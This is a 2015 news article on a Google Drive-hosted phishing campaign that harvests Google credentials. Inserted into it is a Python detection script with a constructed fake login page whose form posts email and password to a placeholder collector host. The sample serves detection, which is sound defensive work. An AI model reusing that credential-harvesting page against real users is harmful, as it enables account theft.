July 30, 2015 By Douglas Bonderud 3 min read

In March of 2014, cybercriminals ran a campaign of Google Drive phishing attacks designed to grab user credentials and gain complete account access. According to Threatpost, researchers at Elastica Cloud Threat Labs have discovered a new effort with eerily similar traits but one significant update: Additional code is now being used to obfuscate the attempted theft. Here’s a quick rundown of the newest Google threat.

Seems Legitimate

With their new effort, attackers hope to trick users into clicking on a provided Google Drive link and enter their login credentials. But how are savvy users getting taken in by this kind of scam? It has to do with Drive itself. While most people use the service to store spreadsheets, photos and text documents, it’s also possible to host entire websites or single Web pages.

As noted by CSO Online, that’s the bait and switch: Drive is used to host a simple Web page that looks like the Google account login screen and asks for user credentials. Extra code is used to obfuscate JavaScript on the page, which collects login credentials and then forwards them to another website.

From the user perspective, everything seems above board. First, they receive an email saying a trusted contact or unknown entity wants to share a Drive document with them. Clicking the link takes them to a fake Google login page — but one that’s actually hosted by Google Drive itself. What’s more, the page also uses Google’s HTTPS and SSL certificate, making it almost impossible to distinguish from the real thing. Once users enter their username and password, they’re redirected to a PDF document, making the entire scam appear legitimate. Account login information, however, is long gone.

According to Aditya K. Sood of Elastica Cloud Threat Labs, there are a few telltale signs that the attack isn’t a legitimate sharing request. First is the header on the fake Drive page, which reads “Google Drive. One Storage.” What it should say is “One account. All of Google.” In addition, the fake page isn’t set up to actually check credentials; it simply sends them along to another server. This means that if users enter the wrong login and password, they’ll still be taken to off-site PDF documents. Finally, there’s a “Create an Account” link that simply reloads the current page.
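The telltale signs above can be turned into a simple static check. The following is an added example, not code from the article or from Elastica; it parses a login page with Python's standard-library HTML parser and flags the three indicators described: a header that does not read “One account. All of Google.”, a form that posts credentials to a host other than the one serving the page (the observable proxy for “the page never checks credentials, it just forwards them”), and a “Create an account” link that merely reloads the current page. The sample pages and the hosting URLs (`drive.example.com`, `collector.example.net`) are constructed for the example.

```python
"""Heuristic checks for a credential-harvesting page hosted on a trusted domain.

Added example (not from the article). The page host alone is not a useful
signal here, because the fake page really is served from the trusted domain;
the content of the page is what gives it away.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EXPECTED_HEADER = "One account. All of Google."  # the genuine heading, per the article


class _LoginPageParser(HTMLParser):
    """Collects page headings, form actions and anchor links."""

    def __init__(self):
        super().__init__()
        self.headers = []        # text of <h1>/<h2> elements
        self.form_actions = []   # action attribute of each <form>
        self.links = []          # (href, link text) for each <a>
        self._in_header = False
        self._in_anchor = False
        self._href = ""
        self._text = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("h1", "h2"):
            self._in_header, self._text = True, []
        elif tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "a":
            self._in_anchor, self._href, self._text = True, attrs.get("href") or "", []

    def handle_data(self, data):
        if self._in_header or self._in_anchor:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag in ("h1", "h2") and self._in_header:
            self.headers.append("".join(self._text).strip())
            self._in_header = False
        elif tag == "a" and self._in_anchor:
            self.links.append((self._href, "".join(self._text).strip()))
            self._in_anchor = False


def analyze_login_page(html, page_url):
    """Return a list of indicator strings found in the page (empty = nothing suspicious)."""
    parser = _LoginPageParser()
    parser.feed(html)
    page_host = urlparse(page_url).netloc.lower()
    findings = []

    # 1. Wrong heading text on what claims to be the Google account login.
    if EXPECTED_HEADER not in parser.headers:
        findings.append("header_mismatch")

    # 2. Credentials posted to a different host than the one serving the page.
    for action in parser.form_actions:
        target_host = urlparse(urljoin(page_url, action)).netloc.lower()
        if target_host and target_host != page_host:
            findings.append("form_posts_offsite:" + target_host)

    # 3. "Create an account" link that resolves back to this very page.
    for href, text in parser.links:
        lowered = text.lower()
        if "create" in lowered and "account" in lowered:
            resolved = urljoin(page_url, href).split("#")[0]
            if href in ("", "#") or resolved == page_url.split("#")[0]:
                findings.append("create_account_self_link")
    return findings


# Constructed sample: a fake login page served from a trusted host (placeholder domain).
FAKE_URL = "https://drive.example.com/host/login.html"
FAKE_PAGE = """<html><body>
<h1>Google Drive. One Storage.</h1>
<form method="post" action="https://collector.example.net/submit">
  <input name="email"><input name="password" type="password">
</form>
<a href="#">Create an account</a>
</body></html>"""

# Constructed sample: what a genuine-looking page with the right properties looks like.
LEGIT_URL = "https://accounts.example.com/signin"
LEGIT_PAGE = """<html><body>
<h1>One account. All of Google.</h1>
<form method="post" action="/signin"></form>
<a href="/signup">Create an account</a>
</body></html>"""

if __name__ == "__main__":
    print("fake page:", analyze_login_page(FAKE_PAGE, FAKE_URL))
    print("legit page:", analyze_login_page(LEGIT_PAGE, LEGIT_URL))
```

The form-action check is only a proxy: the article notes the page's obfuscated JavaScript does the collecting and forwarding, so a static scan can miss exfiltration that never goes through the form's `action`. The behavioral sign Sood describes (wrong credentials are accepted and still lead to the PDF) needs a live, sandboxed submission to confirm, which is why the output here is a list of indicators to review rather than a verdict.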

Phishing Attacks in a Big Pond

While Sood and her colleagues immediately brought the phishing attacks to Google’s attention, this form of compromise continues to be a popular attack vector. According to Firstpost, for example, phishing attacks triggered a “massive surge in DNS threats” through Q2 of 2015, hitting a record high of 133 on the Infoblox DNS Threat Index during the quarter, almost tripling the score of Q2 2014.

While agencies are doing their best to combat phishing scams, many aren’t even sure what they’re looking for. After the recent U.S. Office of Personnel Management (OPM) breach in April, for example, the U.S. Army flagged an email from identity protection firm CSID as a phishing attempt even though the company had been hired by OPM to offer affected workers its services. While the email did share some traits of classic phishing scams — a dot-com address instead of the expected dot-gov, a link asking for personal information and a clickable “Enroll Now” button — a quick look at OPM’s official website would have cleared up any confusion.

There’s a massive pool of users leveraging countless secure and not-so-secure online services, giving malicious actors the ability to pick and choose what type they’ll reel in on any given day. As user knowledge increases, however, cybercriminals are turning to obfuscation and subtle misdirection to gain access — to the point that even large-scale government agencies can’t tell the difference. Best bet? Assume there’s a hook at the end of every unsolicited email — it’s never worth the risky bite.
